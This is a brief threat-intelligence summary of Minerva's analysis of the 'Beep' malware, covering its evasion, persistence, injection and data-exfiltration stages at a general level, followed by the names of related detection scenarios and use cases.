New Sneaky 'Beep' Malware

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Minerva

A malware tracked as "Beep" displayed numerous evasion techniques maintaining stealth on the infected host. Researchers from Minerva spotted the malware on VirusTotal and were intrigued as the malware samples were tagged as "spreader" however, VirusTotal didn't appear to be able to retrieve the files dropped by the malware. Analysis by Minerva discovered various evasion techniques were implemented, including anti-VM and analysis techniques to thwart inspection capabilities from security software. Beep malware is named from its Beep API function instantiated to delay its execution. The malware consists of three components the dropper, injector, and payload. The DLL dropper establishes persistence in the registry and creates a scheduled task to execute a PowerShell script every 13 minutes. Following the execution of the script, the injector is downloaded and launched to inject itself into a legitimate system process to evade detection. Lastly, the Beep payload is dropped to collect system information and exfiltrate the data to the attacker's command and control (C2) server. Although, during Minvera's analysis the C2 server had already been taken down even so, " the malware continued to collect more data, even after 120 failed attempts to send the data." Despite the malware having an effective array of evasion and anti-analysis capabilities, it is assessed to be in-active development thus its capabilities will only grow in future iterations.

Anvilogic Scenario:

• Malicious EXE/DLL Abuses LOLBins for Evasion

Anvilogic Use Cases:

• Suspicious File written to Disk
• Rare Schedule Task Created
• Invoke-WebRequest Command

‍